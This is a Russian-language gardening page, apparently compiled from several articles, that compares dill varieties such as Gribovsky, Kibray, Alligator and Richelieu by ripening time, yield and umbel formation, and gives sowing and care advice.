4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какой сорт укропа лучше выбрать

Лучшие сорта укропа

Не все молодые огородники знают, что существует очень много сортов укропа. Каждый из них имеет собственные особенности выращивания, вкусовые качества, применение. Если правильно подобрать сорт, можно с выгодой для себя выращивать его не один год. Ниже в статье будут описаны лучшие сорта укропа для различных целей.

Лучшие сорта укропа на зелень

На зелень лучше всего годятся такие сорта укропа, которые имеют высокую урожайность и сильный, приятный аромат. Также у них должен быть красивый, насыщенный цвет листочков.

Лучшие сорта укропа на зелень

  • «Редут» – один из лучших сортов для получения зелени. Растение невысокое, имеет мощный корень, развитую прикорневую розетку. Листья полненькие, продолговатые, сегменты длинные. Зонтик большой, такой же ароматный, как и зелень. Урожайность с квадратного метра достигает 1,2 кг.
  • «Аврора» – относительно новый сорт укропа, который можно выращивать на зелень. Созревает за 25 дней. Имеет загущенную розетку листьев, немного приподнятую. Листья ароматные, сочные, нежного вкуса. Не боится эта разновидность практически всех болезней и легко переносит «атаки» вредителей. Высевается обычно под зиму.
  • «Гренадер» – созревает в течение месяца после появления всходов. Обычно выращивается именно для получения ароматной, нежной зелени и использовании ее в свежем виде. Листочки большие, приподнятые, зеленого цвета со слабым налетом. В уходе неприхотлив, урожайность высокая.
  • «Ришелье» – необычный сорт укропа благодаря необычным, большим, немного ажурным листикам. На созревание нужно около 35-40 суток. Зелень очень душистая, может класться в свежие салаты, первые и вторые блюда, консервацию, а также храниться всю зиму в замороженном виде. Известен благодаря устойчивости к вредителям.

Существуют ли сорта без зонтиков?

Зонтики кладутся в консервацию, их также бывает, используют в кулинарии, косметологии, народной медицине, однако при выращивании укропа на зелень или для продажи, они могут лишь мешать. Главная проблема в том, что зонтики как бы старят укроп. До их появления зелень сочная, молодая, а после выпускания зонтика она становится жесткой, может также изменить основной окрас листьев. Так что многие огородники интересуются сортами укропа без зонтиков. А есть ли такие?

Сорта укропа, которые очень поздно выпускают зонтик

Сортов укропа без зонтиков нет, так как растение размножается именно семенами из них. Если не будет зонтиков, то и семян тоже, а значит размножение невозможно. Однако для тех, кто выращивает культуру только на зелень и на продажу были выведены сорта укропа, которые очень поздно выпускают зонтик.

  • «Озорник» растет до 110 см в высоту. Стебель светло-зеленый, имеется восковой налет. Листья среднего размера такого же окраса, как и стебель. Очень долго не образует зонтик. Зонтик большой, с обилием «лучиков», выпуклый. Растение очень ароматное. Урожайность с квадратного метра – 1,6-3,5 кг/м. кв. в зависимости от условий выращивания и ухода. Используется по большей части в свежем виде, а не для хранения.
  • «Аллигатор» созревает за 40-45 суток после того, как появились первые, небольшие ростки. Для уборки на семена нужно подождать до 110 дней. Укроп кустового типа, очень ароматный. Зонтик очень долго не появляется, так что зелень за сезон срезают неоднократно. Зонтик не очень большой имеет до 56 лучей. Урожайность 1,5-2,8 кг/м. кв.
  • «Иней» – среднепоздний сорт укропа. Цветонос обычно не успевает созреть полностью, при выращивании сорта в средних и северных регионах. Листочки сизо-зеленые, с заметным налетом. Растет до 1,7 м (если считать с цветоносом). Зонтики большие, выпуклые. Имеет выраженный аромат у всех частей растения. С квадратного метра собирают до 2,7 кг зелени товарного вида. Рекомендуется для продажи и заморозки.
  • «Дилл» – голландская разновидность, выращивается во всем мире. Быстро растет, не требователен в уходе или типе почвы. Листочки зеленые, красивые, товарного вида, очень ароматные, вкус не навязчивый, легкий. Цветет поздно. Вместе с цветоносом может достигать 150 см. Употребляется обычно в свежем виде.

Кустовой укроп

Кустовые сорта укропа растут большим или малым кустиком, могут быть довольно раскидистыми. Хорошо растут и дают обильные урожаи только при соответствующем уходе. Стоит отметить, что ухода этот вид требует больше, чем привычные всем простые виды, растущие в один стебель. Еще одной особенность является длительное созревание семян в цветоносе. В северных и средних регионах при выращивании под открытым небом они не успевают дозреть, поэтому зонтики рекомендуется удалять сразу, чтобы они не тянули соки с куста.

  • «Кибрай» – среднеспелая разновидность укропа кустового. Растет активно, дает много ароматной зелени, которую можно собирать на еду уже через 30 суток после появления всходов, а на специи она собирается через 72 дня. Розетка довольно широкая, поэтому сеять семена стоит на значительном расстоянии друг от друга и прореживать после появления всходов так, чтобы между отдельными кустами было до 20 см свободного пространства. С квадратного метра за сезон собирают до 6 кг свежей зелени на еду. Отличается устойчивостью к грибкам.
  • «Узоры» – сорт кустового укропа с медленным ростом. Среднепоздний, урожайный. Листья большие, ароматные растут от корня, а также располагаются прямо на стебле зонтика. Сбор основного урожая проводят примерно через 2 месяца после появления всходов, когда нарастет основная зеленая масса. В этом укропе много витамина C и он не подвергается грибковым болезням.
  • «Султан» – новый, очень душистый сорт. Выращивать его лучше через рассаду и в теплице, тогда урожайность будет очень высокой, иногда семена высевают под зиму. Созревает за 40-45 дней.
  • «Гурман» – сорт укропа кустового типа. Созревает быстро, за 40-45 дней, зелени дает много. Листочки ароматные, темно-зеленые, мягкие. Очень прост в выращивании. Его можно сеять уже при температуре +5 градусов. Не боится болезней.
  • «Кустистый» созревает всего за 40 суток. Листочки темно-зеленые, ароматные, мягкие. Зелень долго не теряет товарного вида, имеет универсальное применение. Уход не трудный, урожайность высокая.

Какие сорта отличаются надежностью и неприхотливостью?

Если сорта укропа выращиваются чисто для личного потребления или продажи в небольшом количестве, стоит отдать предпочтение простым, проверенным временем видам, которые неприхотливы в уходе и быстро растут.

Сорта отличающиеся надежностью и неприхотливостью

  • «Грибовский» – наверное, самый простой и привычный для всех сорт укропа. Его даже обычно не высевают, так как размножаться он может самостоятельно и растет на многих участках как бурьян. Но это не значит что сорт не вкусный или плохой, просто он очень сильный, живучий и может размножаться даже без помощи огородника. К условиям выращивания и грунту не требователен. Растет быстро, даже холодным летом дает много зелени. Имеет устойчивость к болезням, обладает приятным, насыщенным ароматом и нежным вкусом. Окрас листочков темно-зеленый, растет примерно до 50-70 см (вместе с зонтиком).
  • «Дальний» – ранний сорт укропа универсального назначения. Ценится за урожайность, устойчивость к болезням, полеганию. Растет быстро, за 38 дней со дня посева образует розетку до 25 см в высоту. Листья зеленые, нормальной формы, имеется восковой налет.
  • «Обильнолиственный» – среднеспелый сорт. Созревает на зелень к 45 дню после появления всходов, а если нужно собирать укроп на специи, то к 70 дню. Растет до 130 см с зонтиком, компактно. Листья средние по размеру, красивого зеленого цвета, с налетом. Урожайность 3-3,4 кг/м. кв. Рекомендуется за хороший аромат, приятный вкус, универсальное применение.

ВИДЕО — Сад и огород. Укроп

Посадка укропа на зелень: лучшие сорта с названиями, описанием и фото, отзывы

Сорта укропа на зелень без образования зонтиков – правда или миф? Ведь всем известно, что это растение размножается из семян, а значит просто обязано иметь зонтики. Однако, к сожалению, именно после их образования листва становится не такой сочной и ароматной, у нее появляется жесткость и признаки увядания.

Содержание:

Существуют ли сорта укропа без зонтиков

Действительно, укроп совсем без образования зонтиков найти невозможно. Однако благодаря усилиям селекционеров появились разновидности, которые намного позже обычных выбрасывают цветоносный побег. Следовательно, такие сорта укропа отдают зелень дольше, а общий урожай увеличивается в 2-3 раза за сезон.

Самые лучшие сорта укропа на зелень

Среди множества разновидностей укропа существует ряд сортов, основное предназначение которых – дать как можно больше продукции. Практически это укроп, который можно срезать несколько раз. Некоторые из них выращивают только в условиях теплиц и парников, а некоторые можно выращивать как в условиях открытого, так и защищенного грунта.

Для теплиц и парников

В теплицах в основном выращивают культуру, отличающуюся быстрым ростом, отличной урожайностью и высокой устойчивостью к заболеваниям и вредителям. Поэтому чаще всего подбирают сорта укропа, способные дать хороший урожай зелени, и при этом справиться с недостаточным освещением. К ним относятся:

Амбрелла – относится к среднеспелым. Рекомендован к выращиванию в теплицах с потолками не ниже 2,5 м, так как способен вырасти до 2-2,2 м. Розетка у него полуприподнятая, а листья крупные. Начинают сбор с 45 дня и продолжают по мере роста. Урожайность Амбреллы составляет до 20 г/куста или 2,0-2,3 кг/м 2 . Амбрелла ценится за хорошую урожайность и ярко-выраженный аромат.

Иней – сильно облиственный куст, имеет крупную листву с небольшим восковым налетом, поэтому кажется сизо-зеленым. Высота 1,5-1,7 м. Цветоносы Иней образовывает поздно, поэтому срезать его можно в течение 3 месяцев. Урожайность составляет 30-35 г/куста. Пряность имеет сильный аромат.

Кибрай – готов к первому сбору уже через 30-32 дня, что свидетельствует о скороспелости. Листва у него сочная, имеет приятный вкус и присущий данной культуре ярко-выраженный аромат. Кибрай относится к категории кустовых, обладает мощной и раскидистой розеткой, поэтому не любит, когда его ограничивают в пространстве. Чтобы Кибрай дал хороший урожай, сажать его нужно не ближе, чем 18-20 см друг от друга. Устойчив к ряду заболеваний.

Для открытого грунта

Учитывая, что укроп достаточно хорошо акклиматизирован под погодные условия центра и юга России, то чаще всего его выращивают в этих регионах в открытом грунте. Среди лучших сортов для открытого грунта являются:

Дальний – первую партию пряности рекомендуется срезать уже через 38-40 дней после всходов. К этому времени однолетник формирует 5-6 веточек и достигает в высоту 30-33 см. Листы приятного зеленого цвета с небольшим восковым налетом. Дальний прекрасно подходит для получения ранней продукции. Имеет хорошие показатели урожайности. Отличительной особенностью является устойчивость к вредителям и ряду самых распространенных заболеваний, характерных для данной культуры.

Макс – кусты средних размеров покрыты небольшими ромбовидными листочками зеленого цвета, вырастают до 15-18 см и дают урожай на уровне 45-55 г/куста.

Кутузовский – отличный сорт для получения богатого урожая ароматной, с хорошими вкусовыми качествами пряности.

Популярные сорта укропа на зелень

В зависимости от сроков, когда начинают появляться стебли, пригодные для срезки и употребления, все сорта укропа условно делят на три группы: ранние, среднеспелые и поздние.

Ранние сорта укропа на зелень

Первая группа – раннеспелые сорта. Образование стеблей у культуры, относящейся к данной категории, начинается через 25-35 дней. Рост и созревание зеленой массы происходит быстро, однако укроп успевает сформировать не более 6-7 листьев и также быстро переходит в фазу цветения.

При выращивании укропа, относящегося к данной группе, следует учитывать, что он нуждается в обильном поливе. Если однолетники испытывают дефицит влаги, то чаще всего формируется не более 3-4 листов, что существенно снижает не только количество, но и качество урожая. Пряность вырастает суховатой, не сочной, теряет свой аромат, а соответственно и полезные свойства.

Лучшими раннеспелыми сортами укропа на зелень считаются:

Гренадер – идеален для получения пряности в сжатые сроки. Розетка листьев крупная, высота куста до 30-33 см. Листья насыщенного зеленого цвета с крупными сегментами. Оптимальные сроки для посева – последняя декада апреля, первые числа мая. Гренадер неприхотлив. Сбор начинают на 35 день. Урожайность пучковой продукции 15 г/куста или до 2,5-2,8 кг/м 2 . Имеет высокую ароматичность. Хорошо отрастает после срезки.

Грибовский – хорошо растет как в закрытом, так и открытом грунте. Проводить срез растительности можно уже через 4-5 недель после всходов. Устойчив к погодным условиям, будь то ветер, дождь или холод. Имеет ярко выраженный аромат. Вырастает до 30-35 см. Можно высевать несколько раз за сезон. Грибовский очень устойчив к болезням. Сроки посева – с апреля по август.

Редут – созревает на несколько дней позже Гренадера и Грибовского. Листовая розетка слегка приподнята над землей. Листы среднего размера, ароматные. Один куст способен в среднем дать продукции до 38-43 граммов или 1,2-1,5 кг /м 2 .Отлично подходит для использования в свежем виде. Можно также применять в консервации и для заморозки. Ароматичность сильная.

Среднеспелые сорта укропа без зонтиков

Вторая группа – среднеспелые сорта укропа. Стеблеобразование у них происходит спустя 42-57 дней после того, как покажутся всходы. Такие разновидности укропа способны сформировать до 10-12 сочных листьев, что существенно увеличивает общий сбор зелени с куста.

Естественно, что укроп формирует и цветоносы, но в более поздние сроки. Это позволяет получить семена для посева на следующий год. К наиболее востребованным сортам этой группы относятся:

Зонтик – урожайный и красивый сорт. Используется как в свежем виде, так и для приготовления консервации. Отличается устойчивостью к ряду болезней укропа и неблагоприятным погодным условиям. Урожай готов к срезке на 6-7 неделе роста растений.

Амазон – срезка урожая начинается не ранее, чем через 45-50 дней. Розетка с сочными и ароматными листьями приподнята над поверхностью почвы. Сорт идеален как укроп для многократной срезки. Достоинством Амазона является неприхотливость к плодородию почвы и способность стойко переносить капризы природы. Еще одним несомненным плюсом Амазона является дружное созревание пучковой продукции и растянутый период плодоношения, который позволяет собирать урожай неоднократно. Сорт универсального назначения, используется как в свежем виде, так и для сушки, переработки, засолки.

Лесногородский – способен образовывать сочные и ароматные листья даже во время цветения. Данный сорт укропа можно смело использовать для повторной срезки. В высоту куст достигает 125-130 см. Его листва имеет высокую товарность и хороший вкус. Листья зеленые, с небольшим сизым оттенком. Срезанная зеленая масса хорошо хранится при температуре +3˚+5˚С.

Ришелье – даже во время цветения имеет хорошо облиственный куст, способный дать ароматную и полезную продукцию. Листовая розетка крупная. Листва имеет цвет хаки, кружевная, с длинными долями. Куст очень красив, и даже в чем-то декоративен. Укроп Ришелье устойчив к заболеваниям и вредителям. Имеет хорошую урожайность, которая составляет 2,8-3,7 к/м 2 . Семена можно высевать с середины весны до конца лета.

Дукат – компактный куст высотой до 0,7 м. Стебель и листья средней длины. Урожайность составляет 25 г/куста или 2,3-2,4 кг/м 2 . Имеет сильную ароматность. Укроп Дукат можно срезать за период выращивания несколько раз.

Позднеспелые сорта укропа без зонтиков

Третья группа – позднеспелые сорта. Растения, относящиеся к данной категории, формируют мощную листовую розетку с 12-14 и более листьями. Период сбора зелени у сортов, относящихся к этой группе, самый продолжительный и обильный, так как укроп очень долго не образует зонтик. Однако первая срезка молодых растений происходит только через 55-60 дней после всходов.

К этой группе относятся следующие сорта укропа, предназначенного для многоразовой срезки:

Салют – готов к сбору через 2 месяца с начала выращивания. Пряность отличается сочностью, имеет нежный, приятный вкус и аромат. Отличительной особенностью Салюта является то, что листья со временем не желтеют. Вырастает он до 60 см. В розетке формируется 25-30 листьев. Кусты Салюта не выходят в стрелку, что также является его большим достоинством. Срезать его можно 3-4 раза за сезон. Урожай составляет 93-95 г с растения или 2,5-2,8 кг/м 2 .

Буян – благодаря тому, что зеленая масса быстро и хорошо отрастает после срезки, продукцию собирают несколько раз. Урожайность Буяна при хорошем уходе достигает 230 г/куста. Буян не терпит, когда ему недостаточно места для роста, поэтому на 1 м 2 высаживают не более 30 кустиков. В процессе выращивания следует знать, Буян отличается повышенной требовательностью к соблюдению графика полива. Его зелень обладает насыщенным ароматом и сочностью. Хорошо хранится в срезанном виде.

Как правильно посадить укроп на зелень

В открытый грунт высевают укроп в зависимости от региона выращивания с начала до конца апреля и на протяжении всего лета. В тепличных же условиях выращивают продукцию в любое время года. Главное – поддерживать в теплице температуру не ниже +12˚С .

Подготовленные и обеззараженные семена высевают в хорошо удобренную почву в борозды на глубину 2-3 см. Бороздки размещают на расстоянии 25-30 см друг от друга.

Как вырастить хороший укроп на зелень

После всходов растения поливают, рыхлят почву для удаления корки и сорняков, при необходимости подкармливают.

По мере роста сорта укропа, которые не растут в зонтик, прореживают, чтобы каждому растению было достаточно питания и влаги. Минимальное расстояние между кустами – 15-20 см. При таких условиях они не будут мешать развиваться друг другу. Сорванные растения можно употреблять в пищу.

Срезают укроп по мере необходимости. Если выращиваются сорта, которые не способны отрастать, то их вырывают с корнем. При уборке сортов укропа, которые после срезки опять растут, листья срезают, а растения поливают и подкармливают, чтобы через некоторое время получить следующий урожай ароматной и пряной продукции.

О том, какие еще сорта укропа можно вырастить для получения сочной и ароматной зелени, вам расскажет автор видео-ролика

Вывод

Сорта укропа на зелень (без зонтиков) способны дать богатый урожай сочной и ароматной продукции. Если правильно подобрать сорт и учесть отличия в уходе за культурой, то сбор молодой зелени можно проводить с весны и до поздней осени.

Лучшие сорта укропа на зелень: раннеспелые, среднеспелые, позднеспелые

Укроп пахучий (Anethum graveolens L.) принадлежит к семейству сельдерейные. Выращивается, как однолетник. В кулинарии и в медицине используются все наземные части – трубчатые стебли, перистые листья, ароматные семена. Культивируется в регионах с теплым, солнечным летом. Для щедрого урожая необходима плодородная, рыхлая почва, богатая гумусом. Нехватка питательных веществ, света и тепла снижает качество растения.

Содержит ароматные эфирные масла, которые благоприятно:

  • действуют на ЖКТ;
  • регулируют артериальное давление;
  • оказывают успокоительное и снотворное действие.

Популярность культуры вдохновила селекционеров на создание новых сортов для открытого грунта и теплиц.

Сортовые особенности укропа

В пищу употребляются нежные листья с пряным ароматом. Он наиболее тонок до начала цветения в конце мая — начале июня. По мере созревания накапливаются эфирные масла и запах становиться насыщенным и пряным.

Планируя заложить грядку, важно решить, зачем она нужна:

  • Для сочных листьев;
  • Пряных стеблей, используемых в соленьях;
  • Семян для лекарства.

Тогда проще определить, какие сорта укропа лучше для посева.

Важный признак выбора – стеблеобразование. Различают такие разновидности:

  • «Раннеспелые» — выращиваемые на зелень;
  • «Среднепоздние» — для молодой зеленой массы и для зонтиков на специи;
  • «Поздние», срок созревания которых 65 – 70 дней, позволяют получить зеленую массу в конце лета, без повторного посева. К этой группе относятся сорта кустового укропа с короткими междоузлиями и густо разветвленными стеблями. Они образуют аккуратные розетки. Их листья обрывают постепенно, начиная с нижнего яруса. Оставшийся куст выпускает новые ростки.

Важно! Подобрав сорта по особенностям созревания, можно обеспечить бесперебойный урожай с весны до самых заморозков.

Самые лучшие душистые сорта укропа

Укроп способен улучшить кулинарные блюда не только в свежем виде, он замечательно поддается сушке, сохраняя ароматные свойства. Пользы будет больше, если заготовить сорта, обладающие рекордным количеством эфирных масел. Среди них такие представители:

Большинство из них дают листовую зелень все лето, поскольку зонтики формируются поздно, в середине августа.

Лучшие раннеспелые сорта укропа

После долгой зимы запах первой огородной зелени – символ весны. Тем более приятно, когда душистые листья появляются в мае. Чтобы собрать зелень в это время года, сорта раннего укропа высевают вскоре после таяния снега, а некоторые — под зиму.

Гренадер

Отличается быстрым ростом. От посева до сбора сочных листьев проходит месяц — полтора. Полное созревание семян наступает через 75 – 90 дней. Все части растения (зелень, побеги и семена) используется на протяжении всей вегетации. Крупные густые листья обеспечивают урожай 1,5 – 3 кг/м 2 . Для специй можно собрать до 5 килограммов сырья.

Грибовский

Один из ранних сортов, который можно купить повсеместно. Его выращивают на огороде и в тепличных условиях. Период от всходов до первой уборки листьев составляет 30 – 45 дней, окончательная зрелость на специи наступает через 55 – 70 дней.

Стебли образуют крупную аккуратную розетку, высотой 25 см. Листья густые, перистые, с голубовато – сизым оттенком. Обладают сильным ароматом и насыщенным вкусом. Техническая масса одного растения для специй – 30 г, листовой вес – 1 кг.

Справка! Огородники отдают предпочтение сорту «Грибовский» за его исключительную неприхотливость и устойчивость к болезням и вредителям.

Сорт успешно размножается самосевом, что позволяет вносить семена в почву осенью, когда среднесуточная температура установится ниже + 8 0 . При более теплой погоде зерна прорастают, ростки погибают при первых заморозках.

Те, кто выращивают данный сорт в зоне умеренного климата, справедливо считают, что это лучший укроп для Подмосковья.

Дальний

Раннеспелый (38-40 дней от всходов до уборки) сорт. Ввиду высокой листовой урожайности (2 – 2,5 кг/м 2 ) выращивается в промышленных масштабах на продажу, для зимних заготовок в сухом и замороженном виде. Зелень нарастает в среднем за полтора месяца. Листья отличаются восковым налетом.

Если семена высеяны в конце апреля, в последних числах мая собирают первый урожай. Не полегает от проливных дождей, стойко противостоит возбудителям заболеваний.

Зонтик

Высокоурожайный сорт. С одного квадратного метра получают 5 – 6 кг зелени. Посев проводят раньше других сортов в конце марта — начале апреля, сразу после таяния снега. Семена помещают в почву на 1,5 – 2 см глубже, чем другие сорта. Что позволяет получить максимальную влагу, необходимую для всходов.

Данный способ позволяет получить первую зелень в мае. Периодическое снятие молодых листьев проводиться выборочно на протяжении всей вегетации. Заключительный урожай убирают через 60 – 85 дней после посева.

Редут

Образует компактные, приподнятые розетки, с которых по 20 – 40 г свежих листьев с насыщенным ароматом. Первый сбор проводят через полтора месяца от прорастания семян. За сезон с одного квадратного метра получают по 1,2-1,3 кг листьев, и 1,4-2,0 кг сырья для специй.

Важно знать! Раннеспелые сорта склонны к быстрому формированию соцветий. Зонтики появляются раньше, чем листья приобретают товарную зрелость. Вот почему собрать много зелени не удастся.

Лучшие среднеспелые сорта укропа

Для данной группы характерно формирование по 8 – 10 крупных листьев на одном кусте. Они появляются поочередно, что позволяет собирать урожай выборочно. Молодые побеги продолжают расти до следующего сбора.

Посмотрите видео! Выбираем лучшие сорта укропа

Лучшие сорта укропа на зелень относятся к среднеспелой категории, иначе ее называют среднепоздней.

Амбрелла

Гибрид узнаваем по крупным, ярко – зеленым листьям. Пластинки — сильно рассеченные, с тонкими нитевидными сегментами. Все части растения обладают сильным ароматом. Стебель вырастает до двух метров в высоту. Густо разветвленные зонтики содержит до 50 цветоносов. Диаметр соцветия – 15 – 20 см.

  • Вес зелени, собранной с одного куста – 15 – 20 г;
  • Товарную зрелость приобретает, через 40 – 48 дней от прорастания всходов;
  • Общее количество – 0,9 – 1,8 кг/м 2 ;
  • С площади в 1 м 2 собирают 35 – 40 г специй через 2,5 – 3 месяца после посева.

Амазон

Рекомендованный срок посева – конец апреля, начало мая. Зелень можно срезать спустя полтора месяца. На одном растении одновременно формируется до 15 – 18 листков, с серебристым оттенком, что составляет 20 – 40 г. Общий вес – 2 – 2,5 кг/м 2 . Урожай специй – 2,5 – 6 кг/м 2 .

Внимание! Приподнятая форма розетки защищает укроп от загрязнения во время весенних дождей.

Сорт используют для получения свежей зелень и для посадки на зонтики, которые нужны при мариновании овощей.

Кибрай

Хорошо подходит для Урала и для Сибири, поскольку переносит низкие температуры до минус 5 0 . Листья набирают сочность через месяц, полтора от посева. Сбор специй проходит спустя 50 – 70 дней. До появления зонтиков розетка вырастает до 40 см. Листовые пластинки сильно рассечены, сегменты тонкие, густые, ярко – зеленого цвета. Аромат средней насыщенности приятный, ненавязчивый.

Семена высевают ранней весной или под зиму. При возвратных заморозках защищают укрывным материалом, например, агроволокном.

С одного метра квадратного получают 2-6 кг зелени.

Высокая устойчивость к грибковым заболеваниям позволяет выращивать сорт в зонах сырого климата.

Посев проводят весной, когда почва прогреется до +8 0 , тогда всходы появляются на 8 – 10 день, а листья для сбора готовы через полтора месяца. Одна розетка дает 20 – 40 г зелени. Общий вес – 3,5 – 4 кг/м 2 . С одного взрослого растения получают специй около 60 г, с метра квадратного – 2,5 – 4 кг.

Огородники ценят сорт за неприхотливость, компактность, приятный аромат.

Ришелье

Первый урожай зелени снимают спустя 40 – 50 дней после посева, заключительный сбор специй проходит через 2,5 – 3 месяца.

Характеристика:

  • Зелень яркого насыщенного цвета с серебристым налетом. Сегменты — тонкие, ажурные, длинные;
  • Высота – 110 – 120 см;
  • Диаметр зонтика – средний;

Вес зелени — 1,5 кг/м 2 , специй – 3,7 кг/м 2 .

Рекомендация! На протяжения вегетации сорт сохраняет зеленые листья на всем стебле, не теряя эффектности. Это свойство сорта используется ландшафтными дизайнерами в декоративных огородах.

Положительное свойство, привлекающее огородников – неприхотливость в уходе и стойкость к болезням.

Лучшие среднепоздние сорта укропа

Кутузовский

Ботанические особенности сорта:

  • Веточки крупные до 20 см, светло – зеленого цвета, сильно разветвленные, с тонкими перистыми сегментами;
  • Величина куста – 1 м;
  • Зонтичное соцветие – 15 – 20 см.
  • Аромат сильный;
  • Вкус приятный, насыщенный;
  • Вес листьев одной розетки – 20 – 30 г;
  • Общая масса зелени – 1,5 кг/м 2 ;
  • Количество специй – 60 г/шт., 1,8 кг/м 2 .

Салют

Относится к кустовым сортам, у которых стебли формируются слабо. Благодаря чему зелень собирают на протяжении всего роста укропа. Окраска перисто — рассеченных пластинок – салатного цвета с восковым налетом. Кустовая розетка одновременно формирует до 30 листков. Компактный размер куста 35 – 40 см, позволяет выращивать сорт в тепличных условиях, и даже посадить на подоконнике, как комнатное растение.

Техническая зрелость наступает через 40 – 45 дней после посева, который проводят с мая по август. Урожай зелени – 4 – 4,5 кг/м 2 .

Борей

Отличается длинными листьями – до 35 см, темно – зеленой окраской, серебристого оттенка. Обладает сильным, пряным запахом. Зеленая масса нарастает быстро, что позволяет часто снимать урожай. Редкое положительное качество – долго не желтеет, в отличие от большинства сортов.

Период от посева до товарной зрелости:

  • 35 – 60 дней – на зелень;
  • 70 – 100 дней – на специи.

Урожайность одна из наиболее высоких:

  • Листовая – 4 — 4,5 кг/м 2 ;
  • Специй – 2 – 3 кг/м 2 .

Есть ли сорта без зонтиков?

С появлением соцветий листья укропа становятся жесткими, тонкий аромат меняется на резкий пряный запах. Для получения свежей зелени с тонким вкусом выведены сорта, зацветающие позднее других. Гибридов без зонтиков пока не существует. Зато есть те, что дают максимальное количество сочных листьев.

Озорник

Основное достоинство – быстрый рост, сочную зелень собирают через 2 — 3 недели после посева. Высевают ранней весной, вскоре после таяния снега. Розетка небольшая – 15 – 20 см, но густооблиственная. Сорт используют в открытом грунте и в «огороде на подоконнике».

С одного растения снимают 25 – 35 г листьев и 1,5 — 3 кг/м 2 .

В тепличных и домашних условиях выращивается круглый год, зимой с дополнительной подсветкой.

Аллигатор

Один из любимых сортов огородников. Нежную зелень тонкого вкуса можно собирать с июня по сентябрь. Товарная спелость листьев формируется через 40 – 45 дней после всхожести. Семена созревают спустя 100 – 120 дней.

Зонтики образуются поздно, их диаметр невелик. Благодаря чему зеленую массу собирают долго. Общий вес с 1 м 2 – 1,7 – 3,2 кг.

Сорт рекомендован для районов с прохладным климатом, ввиду позднего появления соцветий. Успешно используется для листьев во второй половине лета и в начале осени. Характеристика:

  • Высота взрослого растения – 1,5 – 1,7 м;
  • Короткие междоузлия наполняют стебель густыми глинными листьями. Окраска – зелено – сизая;
  • Аромат – сильный.
  • Зелени — 1,7 кг/м 2 ;
  • Семян и стеблей – 2 – 3 кг/м 2 .

Голландский гибрид, широко применяемый во всем мире, отзывы о нем все больше положительные.

  • Молодые листья образуют приподнятую розетку. 18 – 20 см в диаметре;
  • Период получения зеленой массы 35 – 48 дней;
  • Поскольку соцветия появляются поздно, а стебли грубеют медленно, сорт используется для сбора листьев по 2,5 – 3 кг/м 2 .

Заключение

Укроп содержит множество полезных веществ – витаминов и масел. Благодаря селекции можно выбрать сорта, для любых условий – открытого грунта и комнатного огорода. Что разнообразит рацион в любое время года.

Посмотрите видео! Сорта укропа и секреты выращивания

Лучшие сорта укропа для выращивания на грядке, в теплице или дома

Если вы тоже решили заняться выращиванием полезной зелени, вам, несомненно, будет полезно узнать про лучшие сорта укропа. Ведь далеко не от каждого сорта удается получить пышную и пахучую зелень с отменными вкусовыми качествами. Будет обидно потратить время на посев укропа и уход за ним, а в результате получить хилые кустики практически без запаха.

Лучшие раннеспелые сорта укропа

Укроп пахучий очень популярен в России – его выращивают на огородных грядках, в теплицах и даже дома на подоконнике. Конечно, в большинстве случаев укроп огородный используется просто как ароматная приправа при приготовлении различных блюд, но некоторые огородники ценят это растение еще и за его многочисленные целебные свойства, применяя его зелень и семена для улучшения здоровья.

Укроп пахучий очень популярен в России – его выращивают на огородных грядках, в теплицах и даже дома на подоконнике

Сорта укропа могут различаться по форме листов, розетки, по высоте куста и по окраске, а также по срокам стеблеобразования. Классификация по срокам созревания поможет вам лучше сориентироваться в основных сортах и выбрать семена таким образом, чтобы можно было собирать урожай зелени на протяжении всего сезона.

В эту группу входят сорта, которые уже через 35 дней после всходов дают зеленую массу. Правда, они облиственны чуть меньше, чем позднеспелые, и к цветению переходят почти сразу же после образования пяти-шести листьев. Поэтому ранние сорта целесообразно выращивать, если вы хотите поскорее собрать первую свежую зелень с грядки, а также с целью получения зонтиков и семян для консервации.

Грибовский

Невероятно популярный среди отечественных огородников сорт, замечательно подходит как для выращивания на подоконнике, так и в открытом грунте. К погоде укроп Грибовский нетребователен, и даже при условии холодного лета образует хорошую зелень. К достоинствам сорта также относится устойчивость к болезням, интенсивный аромат и достойные вкусовые качества. Листья имеют красивый темно-зеленый цвет, высота стоячей розетки достигает 25 см. Высевать укроп Грибовский можно в течение апреля-июля несколько раз, допускается и подзимний посев.

Высевать укроп Грибовский можно в течение апреля-июля несколько раз

Дальний

Для получения ранней свежей зелени, для сушки, замораживания, маринования и засолки прекрасно подходит сорт укропа Дальний. Ценится он за высокую урожайность, за устойчивость к полеганию и за раннее формирование зелени. После высевания семян в грунт через 38 дней уже образуется розетка полуприподнятого типа около 25 см высотой со средними листьями зеленого цвета, имеющими слабый восковой налет. К вредителям и болезням сорт Дальний отличается устойчивостью.

Аврора

Из новых сортов внимания заслуживает раннеспелый укроп Аврора. После появления молодых всходов собирать зелень можно уже на 25-й день. Сорт отличается густой розеткой приподнятых зеленых листьев, очень ароматных и сочных, а также мощным кустиком со сближенными междоузлиями, благодаря чему после дождя листва меньше загрязняется. Среди прочих достоинств сорта Аврора: устойчивость к болезням и вредителям, хорошая урожайность. С целью получения более раннего урожая семена высевают и под зиму.

После появления молодых всходов собирать зелень можно уже на 25-й день

Среднеспелые сорта укропа

Стеблеобразование у сортов со средней зрелостью наступает дней на 5-10 позже, чем у ранних, вследствие чего на кустиках сформировывается больше листьев, и урожай зелени повышается. Вдобавок, помимо зелени на растении успевают образоваться зонтики и семена, пригодные для приправ.

Лесногородский

Особенность этого сорта укропа состоит в том, что даже осенью, когда у него наливаются семена, можно продолжать срезку зелени. Лесногородский сорт высокоурожайный, не боится поражения болезнями и вредителями, а в его листьях содержится большое количеств провитамина А и витамина С. Листья вырастают крупные и ароматные.

Обильнолиственный

Хозяйственная годность укропа Обильнолистного сохраняется достаточно долго. Отличительные особенности сорта: мощный, хорошо облиственный куст, позднее заложение соцветий и крупные темные листья. Укроп обильнолиственный обладает превосходными товарными качествами, его листья сочны, нежны и ароматны. Хорош свежем виде, пригоден для засолки и маринования. Возможны многократные посевы в течение весны и лета, а также подзимний посев.

Кустистый

От 30 до 40 дней проходит с момента появления всходов кустистого сорта до первой срезки зелени, на специи укроп можно собирать через 70 дней. Укроп кустистый относится к обильнолиственному типу, собирать с него зелень можно неоднократно, постепенно начиная с нижних листиков. Неслучайно сорт Кустистый считается одним из лучших для получения высококачественной зелени в больших объемах. Сильно рассеченные листья очень ароматные, сочные и нежные, хороши как в свежем виде, так и в сушеном.

Самые популярные позднеспелые сорта

